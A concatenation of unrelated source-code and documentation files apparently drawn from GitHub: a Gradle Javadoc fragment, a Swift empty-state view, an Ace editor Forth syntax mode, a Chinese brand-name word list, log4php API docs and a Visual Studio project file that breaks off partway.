href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <div> <ul class="navList"> <li><a href="../../../../../index.html?org/gradle/api/plugins/osgi/OsgiPluginConvention" target="_top">Frames</a></li> <li><a href="OsgiPluginConvention.html" target="_top">No Frames</a></li> </ul> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> 
Nested&nbsp;&nbsp;&nbsp;Field&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<li><a href="#constructor_summary">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_summary">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> <ul class="subNavList"> <li>&nbsp;|&nbsp;Detail:&nbsp;</li> Field&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<li><a href="#constructor_detail">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_detail">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> </div> <p>Gradle API 2.0</p> <a name="skip-navbar_bottom"> <!-- --> </a> </div> </div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
{ "pile_set_name": "Github" }
//
//  EmptyStateView.swift
//  WLEmptyState
//
//  Created by Jorge Ovalle on 12/6/18.
//  Copyright © 2018 Wizeline. All rights reserved.
//

import Foundation
import UIKit

/// Placeholder view displayed when a list has no content: an image on top,
/// followed by a title and a multi-line description, stacked vertically and
/// centered inside the view.
final class EmptyStateView: UIView {

    /// Fallback asset name and strings used by callers when none are provided.
    enum DefaultConstants {
        static let image = "Empty"
        static let title = "Empty DataSet"
        static let description = "Oops There's no data."
    }

    /// Image shown at the top of the empty state; assignment is forwarded to `imageView`.
    var image: UIImage? {
        didSet { self.imageView.image = image }
    }

    /// Title line, centered. Exposed so callers can set text/attributes.
    lazy var titleLabel: UILabel = {
        let title = UILabel(frame: .zero)
        title.backgroundColor = .white
        title.textAlignment = .center
        return title
    }()

    /// Description text, centered and allowed to wrap onto any number of lines.
    lazy var descriptionLabel: UILabel = {
        let caption = UILabel(frame: .zero)
        caption.backgroundColor = .white
        caption.numberOfLines = 0
        caption.textAlignment = .center
        return caption
    }()

    // Image view sized by the fixed 80x80 constraints in `imageContainer`.
    private lazy var imageView: UIImageView = {
        let imageView = UIImageView()
        imageView.translatesAutoresizingMaskIntoConstraints = false
        return imageView
    }()

    // Hosts `imageView` centered; the host's height tracks the image view's height
    // so the stack view row collapses to the image size.
    private lazy var imageContainer: UIView = {
        let host = UIView()
        host.addSubview(imageView)
        NSLayoutConstraint.activate([
            imageView.widthAnchor.constraint(equalToConstant: 80),
            imageView.heightAnchor.constraint(equalToConstant: 80),
            imageView.centerYAnchor.constraint(equalTo: host.centerYAnchor),
            imageView.centerXAnchor.constraint(equalTo: host.centerXAnchor),
            host.heightAnchor.constraint(equalTo: imageView.heightAnchor)])
        return host
    }()

    // Vertical stack holding image container, title, and description.
    private lazy var stackView: UIStackView = {
        let stack = UIStackView(arrangedSubviews: [imageContainer, titleLabel, descriptionLabel])
        stack.translatesAutoresizingMaskIntoConstraints = false
        stack.axis = .vertical
        stack.alignment = .fill
        stack.distribution = .fill
        stack.spacing = 10
        return stack
    }()

    // Intermediate wrapper sized to the stack view and centered in self.
    private lazy var containerView: UIView = {
        let wrapper = UIView(frame: .zero)
        wrapper.translatesAutoresizingMaskIntoConstraints = false
        return wrapper
    }()

    public override init(frame: CGRect) {
        super.init(frame: frame)
        backgroundColor = .white
        addSubview(containerView)
        containerView.addSubview(stackView)
        NSLayoutConstraint.activate([
            containerView.widthAnchor.constraint(equalTo: stackView.widthAnchor),
            containerView.heightAnchor.constraint(equalTo: stackView.heightAnchor),
            stackView.widthAnchor.constraint(equalTo: widthAnchor, multiplier: 0.8),
            stackView.centerXAnchor.constraint(equalTo: centerXAnchor),
            stackView.centerYAnchor.constraint(equalTo: centerYAnchor),
            containerView.centerXAnchor.constraint(equalTo: centerXAnchor),
            containerView.centerYAnchor.constraint(equalTo: centerYAnchor)])
    }

    @available(*, unavailable)
    required init?(coder aDecoder: NSCoder) {
        fatalError("init(coder:) has not been implemented")
    }

    public override func didMoveToSuperview() {
        super.didMoveToSuperview()
        // Fill the superview as soon as this view is attached to one.
        self.frame = self.superview?.bounds ?? .zero
    }

    public override func layoutSubviews() {
        super.layoutSubviews()
        // NOTE(review): the stack view is positioned by Auto Layout constraints,
        // yet its frame is also assigned here; kept as-is to preserve behavior —
        // confirm whether this assignment is actually needed.
        stackView.frame = bounds
    }
}
{ "pile_set_name": "Github" }
// Bundled Ace editor mode for the Forth language: three AMD modules —
// the syntax-highlight rules, a generic C-style fold mode, and the Mode
// definition that ties them together.

// ---- Module 1: syntax-highlight rules for Forth --------------------------
define("ace/mode/forth_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"], function(require, exports, module) {
"use strict";

var oop = require("../lib/oop");
var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules;

var ForthHighlightRules = function() {
    // Rule groups named '#…' are shared sub-rule sets referenced via
    // `include`; 'start' simply delegates to the top-level '#forth' group.
    this.$rules = {
        start: [ { include: '#forth' } ],
        // Line, block, and documentation comment styles (ANSI, iForth, gForth).
        '#comment': [ {
            token: 'comment.line.double-dash.forth',
            regex: '(?:^|\\s)--\\s.*$',
            comment: 'line comments for iForth'
        }, {
            token: 'comment.line.backslash.forth',
            regex: '(?:^|\\s)\\\\[\\s\\S]*$',
            comment: 'ANSI line comment'
        }, {
            token: 'comment.line.backslash-g.forth',
            regex: '(?:^|\\s)\\\\[Gg] .*$',
            comment: 'gForth line comment'
        }, {
            // (* … *) block comment; push/pop implements the multiline state.
            token: 'comment.block.forth',
            regex: '(?:^|\\s)\\(\\*(?=\\s|$)',
            push: [ {
                token: 'comment.block.forth',
                regex: '(?:^|\\s)\\*\\)(?=\\s|$)',
                next: 'pop'
            }, {
                defaultToken: 'comment.block.forth'
            } ],
            comment: 'multiline comments for iForth'
        }, {
            // DOC … ENDDOC documentation block.
            token: 'comment.block.documentation.forth',
            regex: '\\bDOC\\b',
            caseInsensitive: true,
            push: [ {
                token: 'comment.block.documentation.forth',
                regex: '\\bENDDOC\\b',
                caseInsensitive: true,
                next: 'pop'
            }, {
                defaultToken: 'comment.block.documentation.forth'
            } ],
            comment: 'documentation comments for iForth'
        }, {
            token: 'comment.line.parentheses.forth',
            regex: '(?:^|\\s)\\.?\\( [^)]*\\)',
            comment: 'ANSI line comment'
        } ],
        // Built-in constants, numeric literals, and character literals.
        '#constant': [ {
            token: 'constant.language.forth',
            regex: '(?:^|\\s)(?:TRUE|FALSE|BL|PI|CELL|C/L|R/O|W/O|R/W)(?=\\s|$)',
            caseInsensitive: true
        }, {
            token: 'constant.numeric.forth',
            regex: '(?:^|\\s)[$#%]?[-+]?[0-9]+(?:\\.[0-9]*e-?[0-9]+|\\.?[0-9a-fA-F]*)(?=\\s|$)'
        }, {
            token: 'constant.character.forth',
            regex: '(?:^|\\s)(?:[&^]\\S|(?:"|\')\\S(?:"|\'))(?=\\s|$)'
        } ],
        // Top-level group: the order of these includes sets match priority.
        '#forth': [
            { include: '#constant' },
            { include: '#comment' },
            { include: '#string' },
            { include: '#word' },
            { include: '#variable' },
            { include: '#storage' },
            { include: '#word-def' }
        ],
        // Defining/storage words such as CONSTANT, VARIABLE, CREATE, DEFER.
        '#storage': [ {
            token: 'storage.type.forth',
            regex: '(?:^|\\s)(?:2CONSTANT|2VARIABLE|ALIAS|CONSTANT|CREATE-INTERPRET/COMPILE[:]?|CREATE|DEFER|FCONSTANT|FIELD|FVARIABLE|USER|VALUE|VARIABLE|VOCABULARY)(?=\\s|$)',
            caseInsensitive: true
        } ],
        // Quoted strings (ABORT" ." S" etc.) and file names after INCLUDE-like words.
        '#string': [ {
            token: 'string.quoted.double.forth',
            regex: '(ABORT" |BREAK" |\\." |C" |0"|S\\\\?" )([^"]+")',
            caseInsensitive: true
        }, {
            token: 'string.unquoted.forth',
            regex: '(?:INCLUDE|NEEDS|REQUIRE|USE)[ ]\\S+(?=\\s|$)',
            caseInsensitive: true
        } ],
        // Loop indices I and J.
        '#variable': [ {
            token: 'variable.language.forth',
            regex: '\\b(?:I|J)\\b',
            caseInsensitive: true
        } ],
        // Keyword classes: immediate, compile-only, non-immediate, debug words.
        '#word': [ {
            token: 'keyword.control.immediate.forth',
            regex: '(?:^|\\s)\\[(?:\\?DO|\\+LOOP|AGAIN|BEGIN|DEFINED|DO|ELSE|ENDIF|FOR|IF|IFDEF|IFUNDEF|LOOP|NEXT|REPEAT|THEN|UNTIL|WHILE)\\](?=\\s|$)',
            caseInsensitive: true
        }, {
            token: 'keyword.other.immediate.forth',
            regex: '(?:^|\\s)(?:COMPILE-ONLY|IMMEDIATE|IS|RESTRICT|TO|WHAT\'S|])(?=\\s|$)',
            caseInsensitive: true
        }, {
            token: 'keyword.control.compile-only.forth',
            regex: '(?:^|\\s)(?:-DO|\\-LOOP|\\?DO|\\?LEAVE|\\+DO|\\+LOOP|ABORT\\"|AGAIN|AHEAD|BEGIN|CASE|DO|ELSE|ENDCASE|ENDIF|ENDOF|ENDTRY\\-IFERROR|ENDTRY|FOR|IF|IFERROR|LEAVE|LOOP|NEXT|RECOVER|REPEAT|RESTORE|THEN|TRY|U\\-DO|U\\+DO|UNTIL|WHILE)(?=\\s|$)',
            caseInsensitive: true
        }, {
            token: 'keyword.other.compile-only.forth',
            regex: '(?:^|\\s)(?:\\?DUP-0=-IF|\\?DUP-IF|\\)|\\[|\\[\'\\]|\\[CHAR\\]|\\[COMPILE\\]|\\[IS\\]|\\[TO\\]|<COMPILATION|<INTERPRETATION|ASSERT\\(|ASSERT0\\(|ASSERT1\\(|ASSERT2\\(|ASSERT3\\(|COMPILATION>|DEFERS|DOES>|INTERPRETATION>|OF|POSTPONE)(?=\\s|$)',
            caseInsensitive: true
        }, {
            token: 'keyword.other.non-immediate.forth',
            regex: '(?:^|\\s)(?:\'|<IS>|<TO>|CHAR|END-STRUCT|INCLUDE[D]?|LOAD|NEEDS|REQUIRE[D]?|REVISION|SEE|STRUCT|THRU|USE)(?=\\s|$)',
            caseInsensitive: true
        }, {
            token: 'keyword.other.warning.forth',
            regex: '(?:^|\\s)(?:~~|BREAK:|BREAK"|DBG)(?=\\s|$)',
            caseInsensitive: true
        } ],
        // Colon definitions: ':NONAME' or ': name', highlighted until ';' / ';CODE'.
        '#word-def': [ {
            token: [
                'keyword.other.compile-only.forth',
                'keyword.other.compile-only.forth',
                'meta.block.forth',
                'entity.name.function.forth'
            ],
            regex: '(:NONAME)|(^:|\\s:)(\\s)(\\S+)(?=\\s|$)',
            caseInsensitive: true,
            push: [ {
                token: 'keyword.other.compile-only.forth',
                regex: ';(?:CODE)?',
                caseInsensitive: true,
                next: 'pop'
            },
            { include: '#constant' },
            { include: '#comment' },
            { include: '#string' },
            { include: '#word' },
            { include: '#variable' },
            { include: '#storage' },
            { defaultToken: 'meta.block.forth' } ]
        } ]
    };
    // Flattens push/pop and include references into plain Ace states.
    this.normalizeRules();
};

// Metadata carried over from the source TextMate grammar.
ForthHighlightRules.metaData = {
    fileTypes: [ 'frt', 'fs', 'ldr', 'fth', '4th' ],
    foldingStartMarker: '/\\*\\*|\\{\\s*$',
    foldingStopMarker: '\\*\\*/|^\\s*\\}',
    keyEquivalent: '^~F',
    name: 'Forth',
    scopeName: 'source.forth'
};

oop.inherits(ForthHighlightRules, TextHighlightRules);

exports.ForthHighlightRules = ForthHighlightRules;
});

// ---- Module 2: generic C-style folding (braces, /* */ blocks, #region) ----
define("ace/mode/folding/cstyle",["require","exports","module","ace/lib/oop","ace/range","ace/mode/folding/fold_mode"], function(require, exports, module) {
"use strict";

var oop = require("../../lib/oop");
var Range = require("../../range").Range;
var BaseFoldMode = require("./fold_mode").FoldMode;

var FoldMode = exports.FoldMode = function(commentRegex) {
    // Optionally extend the default start/stop markers with custom
    // comment delimiters by splicing them into the regex source.
    if (commentRegex) {
        this.foldingStartMarker = new RegExp(
            this.foldingStartMarker.source.replace(/\|[^|]*?$/, "|" + commentRegex.start)
        );
        this.foldingStopMarker = new RegExp(
            this.foldingStopMarker.source.replace(/\|[^|]*?$/, "|" + commentRegex.end)
        );
    }
};
oop.inherits(FoldMode, BaseFoldMode);

(function() {

    this.foldingStartMarker = /([\{\[\(])[^\}\]\)]*$|^\s*(\/\*)/;
    this.foldingStopMarker = /^[^\[\{\(]*([\}\]\)])|^[\s\*]*(\*\/)/;
    this.singleLineBlockCommentRe= /^\s*(\/\*).*\*\/\s*$/;
    this.tripleStarBlockCommentRe = /^\s*(\/\*\*\*).*\*\/\s*$/;
    this.startRegionRe = /^\s*(\/\*|\/\/)#?region\b/;
    this._getFoldWidgetBase = this.getFoldWidget;

    // Decide whether a row gets a fold widget ("", "start", etc.).
    this.getFoldWidget = function(session, foldStyle, row) {
        var line = session.getLine(row);

        // Single-line /* … */ comments don't fold unless they open a region
        // or are a /*** marker.
        if (this.singleLineBlockCommentRe.test(line)) {
            if (!this.startRegionRe.test(line) && !this.tripleStarBlockCommentRe.test(line))
                return "";
        }

        var fw = this._getFoldWidgetBase(session, foldStyle, row);

        if (!fw && this.startRegionRe.test(line))
            return "start"; // lineCommentRegionStart

        return fw;
    };

    // Compute the Range covered by the fold starting (or ending) at `row`.
    this.getFoldWidgetRange = function(session, foldStyle, row, forceMultiline) {
        var line = session.getLine(row);

        if (this.startRegionRe.test(line))
            return this.getCommentRegionBlock(session, line, row);

        var match = line.match(this.foldingStartMarker);
        if (match) {
            var i = match.index;

            if (match[1])
                return this.openingBracketBlock(session, match[1], row, i);

            var range = session.getCommentFoldRange(row, i + match[0].length, 1);

            if (range && !range.isMultiLine()) {
                if (forceMultiline) {
                    range = this.getSectionRange(session, row);
                } else if (foldStyle != "all")
                    range = null;
            }

            return range;
        }

        if (foldStyle === "markbegin")
            return;

        var match = line.match(this.foldingStopMarker);
        if (match) {
            var i = match.index + match[0].length;

            if (match[1])
                return this.closingBracketBlock(session, match[1], row, i);

            return session.getCommentFoldRange(row, i, -1);
        }
    };

    // Fold a run of rows that are indented at least as deep as `row`,
    // skipping over nested multi-line sub-folds.
    this.getSectionRange = function(session, row) {
        var line = session.getLine(row);
        var startIndent = line.search(/\S/);
        var startRow = row;
        var startColumn = line.length;
        row = row + 1;
        var endRow = row;
        var maxRow = session.getLength();
        while (++row < maxRow) {
            line = session.getLine(row);
            var indent = line.search(/\S/);
            if (indent === -1)
                continue;
            if (startIndent > indent)
                break;
            var subRange = this.getFoldWidgetRange(session, "all", row);

            if (subRange) {
                if (subRange.start.row <= startRow) {
                    break;
                } else if (subRange.isMultiLine()) {
                    row = subRange.end.row;
                } else if (startIndent == indent) {
                    break;
                }
            }
            endRow = row;
        }

        return new Range(startRow, startColumn, endRow, session.getLine(endRow).length);
    };

    // Fold a #region … #endregion block, tracking nesting depth.
    this.getCommentRegionBlock = function(session, line, row) {
        var startColumn = line.search(/\s*$/);
        var maxRow = session.getLength();
        var startRow = row;

        var re = /^\s*(?:\/\*|\/\/|--)#?(end)?region\b/;
        var depth = 1;
        while (++row < maxRow) {
            line = session.getLine(row);
            var m = re.exec(line);
            if (!m) continue;
            if (m[1]) depth--;
            else depth++;

            if (!depth) break;
        }

        var endRow = row;
        if (endRow > startRow) {
            return new Range(startRow, startColumn, endRow, line.length);
        }
    };

}).call(FoldMode.prototype);

});

// ---- Module 3: the Mode object wiring rules + folding into Ace -----------
define("ace/mode/forth",["require","exports","module","ace/lib/oop","ace/mode/text","ace/mode/forth_highlight_rules","ace/mode/folding/cstyle"], function(require, exports, module) {
"use strict";

var oop = require("../lib/oop");
var TextMode = require("./text").Mode;
var ForthHighlightRules = require("./forth_highlight_rules").ForthHighlightRules;
var FoldMode = require("./folding/cstyle").FoldMode;

var Mode = function() {
    this.HighlightRules = ForthHighlightRules;
    this.foldingRules = new FoldMode();
    this.$behaviour = this.$defaultBehaviour;
};
oop.inherits(Mode, TextMode);

(function() {
    // '--' starts a line comment in this dialect; no block-comment toggling.
    this.lineCommentStart = "--";
    this.blockComment = null;
    this.$id = "ace/mode/forth";
}).call(Mode.prototype);

exports.Mode = Mode;
});
{ "pile_set_name": "Github" }
央视/null 电信/null 移动/null 网通/null 联通/null 铁通/null 百度/null 环球网/null 长城网/null 新浪/null 腾讯/null 搜搜/soso 谷歌/null 雅虎/null 微软/null 中关村/null 搜狐/null 网易/null 硅谷/null 维基百科/null 巨人网络/null 阿里巴巴/null 阿里旺旺/旺旺 旺旺/null 淘宝/null 赶集网/null 猪八戒网/null 唯你英语/null 拉手网/null 百贯福泰/null 汇划算/null 汇划算网/null 聚划算/null 天猫/null 天猫网/null 亚马逊/null 亚马逊网/null 拍拍/null 拍拍网/null 京东/null 京东商城/null 返利网/null 支付宝/null 支付宝担保/null 支付宝及时到帐/null 支付宝双工能/null 财付通/null 财付通及时到帐/null 网银在线/null 苏宁易购/null 苏宁电器/null 仙童公司/null 开源中国/null 畅想网络/null 快乐大本营/null 越策越开心/null 超级男声/null 超男/null 超级女声/超女 超女/超级女声 好声音/null 快乐男声/快男 快男/快乐男声 快乐女声/null 快女/null 德克士/null 肯德基/null 奥利奥/null 回头客/null 苏波尔/null 苏宁/null 苏宁电器/null 苏宁易购/null 中央银行/null 人民银行/null 工商银行/null 农业银行/null 中国银行/null 建设银行/null 交通银行/null 华夏银行/null 光大银行/null 招商银行/null 中信银行/null 兴业银行/null 民生银行/null 深圳发展银行/null 广东发展银行/null 上海浦东发展银行/null 恒丰银行/null 农业发展银行/null 国家进出口信贷银行/null 国家开发银行/null 北京商业银行/null 上海银行/null 济南商业银行/null 信用社/null 农村信用社/null 邮政局/null 邮政储蓄银行/null
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- template designed by Marco Von Ballmoos --> <title>Docs for page LoggerDOMConfigurator.php</title> <link rel="stylesheet" href="../../media/stylesheet.css" /> <meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/> </head> <body> <div class="page-body"> <h2 class="file-name">/xml/LoggerDOMConfigurator.php</h2> <a name="sec-description"></a> <div class="info-box"> <div class="info-box-title">Description</div> <div class="nav-bar"> <span class="disabled">Description</span> | <a href="#sec-classes">Classes</a> | <a href="#sec-includes">Includes</a> | <a href="#sec-constants">Constants</a> </div> <div class="info-box-body"> <!-- ========== Info from phpDoc block ========= --> <p class="short-description">Copyright 2004 The Apache Software Foundation.</p> <p class="description"><p>This software is published under the terms of the Apache Software License version 2.0, a copy of which has been included with this distribution in the LICENSE file.</p></p> </div> </div> <a name="sec-classes"></a> <div class="info-box"> <div class="info-box-title">Classes</div> <div class="nav-bar"> <a href="#sec-description">Description</a> | <span class="disabled">Classes</span> | <a href="#sec-includes">Includes</a> | <a href="#sec-constants">Constants</a> </div> <div class="info-box-body"> <table cellpadding="2" cellspacing="0" class="class-table"> <tr> <th class="class-table-header">Class</th> <th class="class-table-header">Description</th> </tr> <tr> <td style="padding-right: 2em; vertical-align: top"> <a href="../../log4php/xml/LoggerDOMConfigurator.html">LoggerDOMConfigurator</a> </td> <td> Use this class to initialize the log4php environment using expat parser. 
</td> </tr> </table> </div> </div> <a name="sec-includes"></a> <div class="info-box"> <div class="info-box-title">Includes</div> <div class="nav-bar"> <a href="#sec-description">Description</a> | <a href="#sec-classes">Classes</a> | <span class="disabled">Includes</span> | <a href="#sec-constants">Constants</a> </div> <div class="info-box-body"> <a name="_LOG4PHP_DIR_/LoggerManager_php"><!-- --></a> <div class="evenrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/LoggerManager.php'</span>) (line <span class="line-number">24</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/or/LoggerObjectRenderer_php"><!-- --></a> <div class="oddrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/or/LoggerObjectRenderer.php'</span>) (line <span class="line-number">19</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/LoggerLog_php"><!-- --></a> <div class="evenrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/LoggerLog.php'</span>) (line <span class="line-number">23</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/LoggerLayout_php"><!-- --></a> <div class="oddrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/LoggerLayout.php'</span>) (line <span class="line-number">22</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/LoggerAppender_php"><!-- --></a> <div class="evenrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/LoggerAppender.php'</span>) (line <span 
class="line-number">21</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/spi/LoggerConfigurator_php"><!-- --></a> <div class="oddrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/spi/LoggerConfigurator.php'</span>) (line <span class="line-number">20</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="_LOG4PHP_DIR_/helpers/LoggerOptionConverter_php"><!-- --></a> <div class="evenrow"> <div> <span class="include-title"> <span class="include-type">require_once</span> (<span class="include-name">LOG4PHP_DIR.'/helpers/LoggerOptionConverter.php'</span>) (line <span class="line-number">18</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> </div> </div> <a name="sec-constants"></a> <div class="info-box"> <div class="info-box-title">Constants</div> <div class="nav-bar"> <a href="#sec-description">Description</a> | <a href="#sec-classes">Classes</a> | <a href="#sec-includes">Includes</a> | <span class="disabled">Constants</span> </div> <div class="info-box-body"> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_APPENDER_STATE"><!-- --></a> <div class="oddrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_APPENDER_STATE</span> = 1000 (line <span class="line-number">26</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_DEFAULT_CONFIGURATION"><!-- --></a> <div class="evenrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_DEFAULT_CONFIGURATION</span> = '&lt;?xml version=&quot;1.0&quot; ?&gt;<br />&lt;log4php:configuration threshold=&quot;all&quot;&gt;<br /> &lt;appender name=&quot;A1&quot; class=&quot;LoggerAppenderEcho&quot;&gt;<br /> &lt;layout class=&quot;LoggerLayoutSimple&quot; /&gt;<br /> 
&lt;/appender&gt;<br /> &lt;root&gt;<br /> &lt;level value=&quot;debug&quot; /&gt;<br /> &lt;appender_ref ref=&quot;A1&quot; /&gt;<br /> &lt;/root&gt;<br />&lt;/log4php:configuration&gt;' (line <span class="line-number">37</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> <ul class="tags"> <li><span class="field">var:</span> the default configuration document</li> </ul> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_DEFAULT_FILENAME"><!-- --></a> <div class="oddrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_DEFAULT_FILENAME</span> = './log4php.xml' (line <span class="line-number">32</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_FILTER_STATE"><!-- --></a> <div class="evenrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_FILTER_STATE</span> = 1040 (line <span class="line-number">30</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_LAYOUT_STATE"><!-- --></a> <div class="oddrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_LAYOUT_STATE</span> = 1010 (line <span class="line-number">27</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_LOGGER_STATE"><!-- --></a> <div class="evenrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_LOGGER_STATE</span> = 1030 (line <span class="line-number">29</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_ROOT_STATE"><!-- --></a> <div class="oddrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_ROOT_STATE</span> = 1020 (line <span class="line-number">28</span>) 
</span> </div> <!-- ========== Info from phpDoc block ========= --> </div> <a name="defineLOG4PHP_LOGGER_DOM_CONFIGURATOR_XMLNS"><!-- --></a> <div class="evenrow"> <div> <span class="const-title"> <span class="const-name">LOG4PHP_LOGGER_DOM_CONFIGURATOR_XMLNS</span> = 'HTTP://LOGGING.APACHE.ORG/LOG4PHP/' (line <span class="line-number">52</span>) </span> </div> <!-- ========== Info from phpDoc block ========= --> <ul class="tags"> <li><span class="field">var:</span> the elements namespace</li> </ul> </div> </div> </div> <p class="notes" id="credit"> Documentation generated by <a href="http://www.phpdoc.org" target="_blank">phpDocumentor 1.3.2</a> </p> </div></body> </html>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="Windows-1252"?> <VisualStudioProject ProjectType="Visual C++" Version="9.00" Name="matdump" ProjectGUID="{F85AD892-CF1E-47B7-BC7D-ED00BCA859C0}" RootNamespace="matdump" Keyword="Win32Proj" TargetFrameworkVersion="196613" > <Platforms> <Platform Name="Win32" /> <Platform Name="x64" /> </Platforms> <ToolFiles> </ToolFiles> <Configurations> <Configuration Name="Debug|Win32" OutputDirectory="$(SolutionDir)$(ConfigurationName)" IntermediateDirectory="$(ConfigurationName)" ConfigurationType="1" CharacterSet="1" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" /> <Tool Name="VCCLCompilerTool" Optimization="0" AdditionalIncludeDirectories="&quot;$(SolutionDir)&quot;;&quot;$(SolutionDir)/../getopt&quot;;&quot;$(SolutionDir)/../src&quot;" PreprocessorDefinitions="REPLACE_GETOPT" MinimalRebuild="true" BasicRuntimeChecks="3" RuntimeLibrary="3" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="4" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" AdditionalDependencies="libmatio.lib" LinkIncremental="1" AdditionalLibraryDirectories="$(SolutionDir)$(ConfigurationName)" GenerateDebugInformation="true" SubSystem="1" TargetMachine="1" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> <Configuration Name="Debug|x64" OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)" IntermediateDirectory="$(PlatformName)\$(ConfigurationName)" ConfigurationType="1" CharacterSet="1" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool 
Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" TargetEnvironment="3" /> <Tool Name="VCCLCompilerTool" Optimization="0" AdditionalIncludeDirectories="&quot;$(HDF5_DIR)/include&quot;;&quot;$(SolutionDir)&quot;;&quot;$(SolutionDir)/../getopt&quot;;&quot;$(SolutionDir)/../src&quot;" PreprocessorDefinitions="REPLACE_GETOPT;MAT73=1;HAVE_HDF5=1;HAVE_ZLIB=1;_HDF5USEDLL_" MinimalRebuild="true" BasicRuntimeChecks="3" RuntimeLibrary="2" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="3" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" AdditionalDependencies="libmatio.lib" LinkIncremental="2" AdditionalLibraryDirectories="$(SolutionDir)$(PlatformName)\$(ConfigurationName)" GenerateDebugInformation="true" SubSystem="1" TargetMachine="17" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> <Configuration Name="Release|Win32" OutputDirectory="$(SolutionDir)$(ConfigurationName)" IntermediateDirectory="$(ConfigurationName)" ConfigurationType="1" CharacterSet="1" WholeProgramOptimization="1" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" /> <Tool Name="VCCLCompilerTool" Optimization="2" 